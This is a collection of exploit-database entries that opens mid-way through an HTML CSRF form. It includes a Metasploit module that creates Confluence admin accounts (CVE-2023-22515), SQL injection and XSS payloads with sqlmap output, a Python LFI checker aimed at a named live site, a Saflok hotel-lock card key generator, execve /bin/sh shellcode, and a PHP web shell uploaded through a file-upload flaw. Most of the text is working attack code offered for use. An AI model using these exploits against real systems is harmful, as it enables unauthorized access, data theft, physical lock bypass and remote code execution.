name="lev4" value="2" /> <input type="hidden" name="usr5" value="consulter3" /> <input type="hidden" name="psw5" value="consulter3" /> <input type="hidden" name="lev5" value="2" /> <input type="submit" value="Change" /> </form> </body> </html>

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control', 'Description' => %q{ This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass. A specially crafted request can be create new admin account without authentication on the target Atlassian server. }, 'Author' => [ 'Unknown', # exploited in the wild 'Emir Polat' # metasploit module ], 'References' => [ ['CVE', '2023-22515'], ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'], ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'] ], 'DisclosureDate' => '2023-10-04', 'DefaultOptions' => { 'RPORT' => 8090 }, 'License' => MSF_LICENSE, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/), OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]), OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email]) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/login.action') ) return Exploit::CheckCode::Unknown unless res return Exploit::CheckCode::Safe unless res.code == 200 poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/ confluence_version = Rex::Version.new(Regexp.last_match(1)) vprint_status("Detected Confluence version: #{confluence_version}") if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) || confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) || confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1')) return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}") end Exploit::CheckCode::Safe("Confluence version: #{confluence_version}") end def run res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/server-info.action'), 'vars_get' => { 'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false' } ) return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200 print_good('Found server-info.action! Trying to ignore setup.') created_user = create_admin_user res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'), 'headers' => { 'X-Atlassian-Token' => 'no-check' } ) return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200 create_credential({ workspace_id: myworkspace_id, origin_type: :service, module_fullname: fullname, username: datastore['NEW_USERNAME'], private_type: :password, private_data: datastore['NEW_PASSWORD'], service_name: 'Atlassian Confluence', address: datastore['RHOST'], port: datastore['RPORT'], protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED }) print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}") print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action") end def create_admin_user res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'), 'headers' => { 'X-Atlassian-Token' => 'no-check' }, 'vars_post' => { 'username' => datastore['NEW_USERNAME'], 'fullName' => 'New Admin', 'email' => datastore['NEW_EMAIL'], 'password' => datastore['NEW_PASSWORD'], 'confirm' => datastore['NEW_PASSWORD'], 'setup-next-button' => 'Next' } ) res&.code == 302 end end

# Exploit Title: WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - "Dashboard Redirect" field Stored Cross-Site Scripting (XSS) # Google Dork: NA # Date: 28/10/2023 # Exploit Author: Rachit Arora # Vendor Homepage: # Software Link: https://wordpress.org/plugins/admin-bar-dashboard-control/ # Version: 1.2.8 # Category: Web Application # Tested on: Windows # CVE : 2023-47184 1. Install WordPress (latest) 2. Install and activate Admin Bar & Dashboard Access Control. 3. Navigate to "Admin Bar & Dash" >> Under Dashboard Access and in the "Dashboard Redirect" enter the payload into the input field. "onfocusin=alert``+autofocus> "onfocusin=alert`document.domain`+autofocus> 4. You will observe that the payload successfully got stored and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

Paulos Yibelo discovered and reported this Local File Inclusion vulnerability in WordPress WP Rocket Plugin. This could allow a malicious actor to include local files of the target website and show its output onto the screen. Files which store credentials, such as database credentials, could potentially allow complete database takeover depending on the configuration. This vulnerability has been fixed in version 2.10.4. https://patchstack.com/database/vulnerability/wp-rocket/wordpress-wp-rocket-plugin-2-10-3-local-file-inclusion-lfi-vulnerability https://vulners.com/wpvulndb/WPVDB-ID:5484D821-7017-47A8-90D8-7D87CB5E0E50 Exploit : #Code By E1.Coders #Dork : "Powered by WP Rocket" filetype:php intitle:"WP Rocket Configuration" -"in" -"dirlist" Dork : http://example.com/wp-content/plugins/wp-rocket/inc/functions/min/v2.10.3/min/min.php import requests import time def check_wp_rocket_version(url): version_url = url + "/wp-rocket/css/rocket.css" try: response = requests.get(version_url) version = response.headers["X-Powered-By"] if "WP Rocket/" in version: version = version.split("/")[1] return version except Exception as e: print(f"Error occurred while fetching WP Rocket version: {e}") return None def test_wp_rocket_lfi_bug(url): lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json" try: response = requests.get(lfi_url) if response.status_code == 200: return True except Exception as e: print(f"Error occurred while testing LFI: {e}") return False def main(): url = "http://arvatools.com" wp_rocket_version = check_wp_rocket_version(url) if wp_rocket_version: print(f"WP Rocket Version: {wp_rocket_version}") if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]: result = test_wp_rocket_lfi_bug(url) if result: print("LFI vulnerability found in WP Rocket") else: print("LFI vulnerability not found in WP Rocket") else: print("WP Rocket version is not affected by the LFI bug") else: print("Unable to fetch WP Rocket version") if __name__ == "__main__": main()

// Exploit Title: Saflok KDF // Date: 2023-10-29 // Exploit Author: a51199deefa2c2520cea24f746d899ce // Vendor Homepage: https://www.dormakaba.com/ // Version: System 6000 // Tested on: Dormakaba Saflok cards // CVE: N/A #include <stdio.h> #include <stdint.h> #define MAGIC_TABLE_SIZE 192 #define KEY_LENGTH 6 #define UID_LENGTH 4 int main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s <32-bit uid value in hexadecimal format>\n", argv[0]); return 1; } uint8_t magic_table[MAGIC_TABLE_SIZE] = { 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xF0, 0x57, 0xB3, 0x9E, 0xE3, 0xD8, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x96, 0x9D, 0x95, 0x4A, 0xC1, 0x57, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x43, 0x58, 0x0D, 0x2C, 0x9D, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFF, 0xCC, 0xE0, 0x05, 0x0C, 0x43, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x34, 0x1B, 0x15, 0xA6, 0x90, 0xCC, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x89, 0x58, 0x56, 0x12, 0xE7, 0x1B, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xBB, 0x74, 0xB0, 0x95, 0x36, 0x58, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFB, 0x97, 0xF8, 0x4B, 0x5B, 0x74, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xC9, 0xD1, 0x88, 0x35, 0x9F, 0x92, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x92, 0xE9, 0x7F, 0x58, 0x97, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x16, 0x6C, 0xA2, 0xB0, 0x9F, 0xD1, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x27, 0xDD, 0x93, 0x10, 0x1C, 0x6C, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xDA, 0x3E, 0x3F, 0xD6, 0x49, 0xDD, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x58, 0xDD, 0xED, 0x07, 0x8E, 0x3E, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x5C, 0xD0, 0x05, 0xCF, 0xD9, 0x07, 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x11, 0x8D, 0xD0, 0x01, 0x87, 0xD0 }; uint8_t uid[UID_LENGTH]; sscanf(argv[1], "%2hhx%2hhx%2hhx%2hhx", &uid[0], &uid[1], &uid[2], &uid[3]); uint8_t magic_byte = (uid[3] >> 4) + (uid[2] >> 4) + (uid[0] & 0x0F); uint8_t magickal_index = (magic_byte & 0x0F) * 12 + 11; uint8_t key[KEY_LENGTH] = {magic_byte, uid[0], uid[1], uid[2], uid[3], magic_byte}; uint8_t carry_sum = 0; for (int i = KEY_LENGTH - 1; i >= 0 && magickal_index >= 0; i--, magickal_index--) { uint16_t keysum = key[i] + magic_table[magickal_index]; key[i] = (keysum & 0xFF) + carry_sum; carry_sum = keysum >> 8; } printf("Generated Key: "); for (int i = 0; i < KEY_LENGTH; i++) { printf("%02X", key[i]); } printf("\n"); return 0; }

# Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability # Date: 2023-11-14 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018 ------------------------------------------------------------------------------- 1. Description: The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database. Vulnerable File: /hospitalLogin.php Parameter Names: hemail, hpassword 2. Proof of Concept: ---------------------- Execute sqlmap using either the 'hemain' or 'hpassword' parameter to retrieve the current database: sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db SQLMap Response: ---------------------- Parameter: hemail (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login ------------------------------------------------------------------------------- 1. Description: The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database Vulnerable File: /receiverLogin.php Parameter Names: remail, rpassword 2. Proof of Concept: ---------------------- Execute sqlmap using either the 'remail' or 'rpassword' parameter to retrieve the current database: sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db SQLMap Response: ---------------------- --- Parameter: remail (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login --- --- Parameter: rpassword (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login --- ------------------------------------------------------------------------------- # Description: The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database. Vulnerable File: /receiverReg.php Parameter Name: remail # Proof of Concept: ---------------------- 1. Save the POST request of receiverReg.php to a request.txt file --- POST /bloodbank/file/receiverReg.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868 Content-Length: 877 Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/register.php Cookie: PHPSESSID=<some-cookie-value> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------2653697510272605730288393868 Content-Disposition: form-data; name="rname" test -----------------------------2653697510272605730288393868 Content-Disposition: form-data; name="rbg" A+ -----------------------------2653697510272605730288393868 Content-Disposition: form-data; name="rcity" test -----------------------------2653697510272605730288393868 Content-Disposition: form-data; name="rphone" 05555555555 -----------------------------2653697510272605730288393868 Content-Disposition: form-data; name="remail" test@test -----------------------------2653697510272605730288393868 Content-Disposition: form-data; name="rpassword" test123 -----------------------------2653697510272605730288393868 Content-Disposition: form-data; name="rregister" Register -----------------------------2653697510272605730288393868-- --- 2. Execute sqlmap using 'remail' parameter to retrieve the current database: sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db

# Exploit Title: Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes] # Shellcode Author: Alexys (0x177git) # Tested on: Linux (x86_64) # Shellcode Description: creating a new process using execve() syscall sending bin//sh as argument | (encrypted using XOR operation was QWORD size (/bin - //sh)) # Blog post: @MoreRubyOfSec (https://t.me/MoreRubyOfSec) on Telegram # Original code: [https://github.com/0x177git/xor-encrypted-execve-sh](https://github.com/0x177git/xor-encrypted-execve-sh/blob/main/execve-xor-encrypted-argv.asm) ---- Assembly code ---- section .text global _start _start: xor eax, eax xor edx, edx ; clear rdx (argv on execve() protoype) mov qword [rsp-32], 0x7466684b ; mov qword [rsp-28],0x60650b1d ; encrypted(/bin//sh) 0x60, 0x65, 0xb, 0x1d, 0x74, 0x66, 0x68, 0x4b xor qword [rsp-32], 0x1a0f0a64 xor qword [rsp-28], 0x08162432 ; passwd 0x8, 0x16, 0x24, 0x32, 0x1a, 0xf, 0xa, 0x64 lea rdi, [rsp-32] push rax ; end of string push rdi ; send string to stack mov rsi, rsp ; send address of RSP to rsi -> (arg on linux syscall architecture convection) || execve(rsi, rdx) ; call execve() mov al, 0x3b syscall - - - - shellcode execution using stack in c ( gcc -z execstack shellcode.c -o shellcode ) ---- /* "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05" ; */ void main () { const char shellcode [] = "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05" ; void ( * f )() = ( void ( * )()) shellcode ; f (); }

# Exploit Title: Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting # Date: 01-03-2024 # Exploit Author: Shubham Pandey # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: 1.0 # Tested on: Windows, Linux # CVE : CVE-2024-27743 # Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the Address parameter in the add_invoices.php component. # POC: 1. Here we go to : http://localhost/fuelflow/index.php 2. Now login with default [email protected] and Password=admin 3. Now go to "http://localhost/fuelflow/admin/add_invoices.php" 4. Fill the payload "<script>alert(0)</script>" in "Address" field 5. Stored XSS will be present in " http://localhost/fuelflow/admin/manage_invoices.php" page # Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.md

# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2 # Date: 14.11.2023 # Exploit Author: Meryem Taşkın # Vendor Homepage: https://www.wpfastestcache.com/ # Software Link: https://wordpress.org/plugins/wp-fastest-cache/ # Version: WP Fastest Cache 1.2.2 # Tested on: WP Fastest Cache 1.2.2 # CVE: CVE-2023-6063 ## Description An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication. ## Vuln Code public function is_user_admin(){ global $wpdb; foreach ((array)$_COOKIE as $cookie_key => $cookie_value){ if(preg_match("/wordpress_logged_in/i", $cookie_key)){ $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); break; } } if(isset($username) && $username){ $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value` FROM `$wpdb->users` INNER JOIN `$wpdb->usermeta` ON `$wpdb->users`.`user_login` = \"$username\" AND # $username varible is not escaped vulnerable to SQL injection ..... ## Exploit GET / HTTP/1.1 Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221 Host: meryem.local ## Parameter: Cookie #1* ((custom) HEADER) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg --- ## References - [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/) - [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/) - [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063) ## Credits - Original Researcher: Alex Sanford - PoC: Meryem Taşkın

# Exploit Title: Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file # Date: 01-03-2024 # Exploit Author: Shubham Pandey # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: 1.0 # Tested on: Windows, Linux # CVE : CVE-2024-27744 # Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component. # POC: 1. Here we go to : http://localhost/fuelflow/index.php 2. Now login with default [email protected] and Password=admin 3. Now go to "http://localhost/fuelflow/admin/profile.php" 4. Upload the xss.svg file in "Image" field 5. Stored XSS will be present in " http://localhost/fuelflow/assets/images/xss.svg" page 6. The content of the xss.svg file is given below: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> > <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS by Shubham Pandey"); </script> </svg> # Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md

# Exploit Title: Petrol Pump Management Software v.1.0 - SQL Injection # Date: 01-03-2024 # Exploit Author: Shubham Pandey # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: 1.0 # Tested on: Windows, Linux # CVE : CVE-2024-27746 # Description: SQL Injection vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email address parameter in the index.php component. # POC: 1. Here we go to : http://localhost/fuelflow/index.php 2. Now login with username: [email protected]';SELECT SLEEP(10)# and Password=test 3. Page will load for 10 seconds because of time-based sql injection # Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.md

# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload # Date: 01-03-2024 # Exploit Author: Shubham Pandey # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: 1.0 # Tested on: Windows, Linux # CVE : CVE-2024-27747 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email Image parameter in the profile.php component. # POC: 1. Here we go to : http://localhost/fuelflow/index.php 2. Now login with default [email protected] and Password=admin 3. Now go to "http://localhost/fuelflow/admin/profile.php" 4. Upload the phpinfo.php file in "Image" field 5. Phpinfo will be present in " http://localhost/fuelflow/assets/images/phpinfo.php" page 6. The content of phpinfo.php file is given below: <?php phpinfo();?> # Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md

# Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload # Date: 2/11/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://codeastro.com # Version: V1.0 # Tested on: Windows 11 + XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3 ## Description ## This Vulnerability allow the attacker to execute command injection payloads and upload malicious file into web server . ----------------------------------------------------------------------------------------------------------------------- ## Simple RCE Payload : ## <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system_payload($_GET['cmd']); } ?> </pre> </body> </html> ----------------------------------------------------------------------------------------------------------------------- ## Steps to Reproduce ## 1- Open Burp Suite ( Community + Professional ) + Click on Proxy Tab Then Enable Intercept By Clicking at Intercept is off . 2- Open The Browser From Proxy Tab Then Open The Resgister Web Page : http://localhost:8080/realestate/register.php 3- Prepare Your RCE PHP Script Base From Notepad or Any Editor Then Save the RCE PHP Script Base as : avatar.php filename . 4- Change The Filename extension into avatar.png , after save the RCE PHP Script . 5- Click Chose File From User Image Section Then Upload Your avatar.png file . 6- Click Register Then Back to Burp Suite Proxy Tab : 7- Modify File Extension Into Orginal File Extension that is : avatar.php in Example : Content-Disposition: form-data; name="uimage"; filename="avatar.png" Content-Type: image/png . 8- After Modify The Content-Disposition From Burp Suite Proxy Tab Into Orginal File Extension Click Forward Button . 9- Open The Login Page : http://localhost:8080/realestate/login.php Then Register Through Your Account Email & Password . 10 - From MenuBar Click My Account & Profile Then Right Click at Image Icon > Copy Link > New Tab > Paste > Your Malicious Command is Ready To Execute .! ----------------------------------------------------------------------------------------------------------------------- ## Burp Request : ## POST /realestate/register.php HTTP/1.1 Host: localhost Content-Length: 1100 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/realestate/register.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="name" johnhamosh ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="phone" +199988764 ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="pass" <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="utype" user ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="uimage"; filename="avatar.php" Content-Type: image/png <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ------WebKitFormBoundarypgW90eleiRxRzcEK Content-Disposition: form-data; name="reg" Register ------WebKitFormBoundarypgW90eleiRxRzcEK-- ----------------------------------------------------------------------------------------------------------------------- ## PoC Simple RCE Through This Vulnerability : ## Directory of C:\xampp\htdocs\realestate\admin\user .. 02/11/2024 08:09 PM 315 avatar.php 02/11/2024 08:04 PM 315 avatar.png 02/11/2024 06:54 PM 9,376 avatarm2-min.jpg 02/11/2024 06:54 PM 13,186 avatarm7-min.jpg 02/11/2024 07:47 PM 1,814 avatars.php 02/11/2024 06:54 PM 1,313 gr7.png 02/11/2024 07:36 PM 28 poc.php ----------------------------------------------------------------------------------------------------------------------- ## Video PoC : ## 1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4 2- https://gofile.io/d/AEWEgI ----------------------------------------------------------------------------------------------------------------------- Greetz !